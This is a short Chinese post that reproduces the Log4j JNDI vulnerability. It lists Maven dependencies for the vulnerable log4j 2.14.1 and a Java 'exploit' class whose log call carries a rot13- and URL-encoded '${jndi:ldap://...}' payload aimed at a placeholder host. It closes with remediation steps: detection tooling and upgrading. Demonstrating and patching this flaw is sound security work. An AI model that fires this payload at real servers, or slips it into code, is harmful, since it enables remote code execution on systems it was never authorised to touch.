昨天晚上居然睡着了 emo了
新建一个Maven项目,在pom.xml导入即可
<dependencies>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.1</version>
</dependency>
</dependencies>
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class exploit {
private static final Logger logger = LogManager.getLogger(exploit.class);
public static void main(String[] args) {
//This encrypt poc---------decrypt:rot13 :)
logger.error("%24%7Bwaqv:yqnc:%2F%2Fxxx:xxx%2Fuk.gkg%7D");
}
}
解决办法
1、使用火线安全的洞态IAST进行检测 --》DongTai-IAST
2、检查pom.xml是否存在log4j版本 2.0<= 2.14.1
3、当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
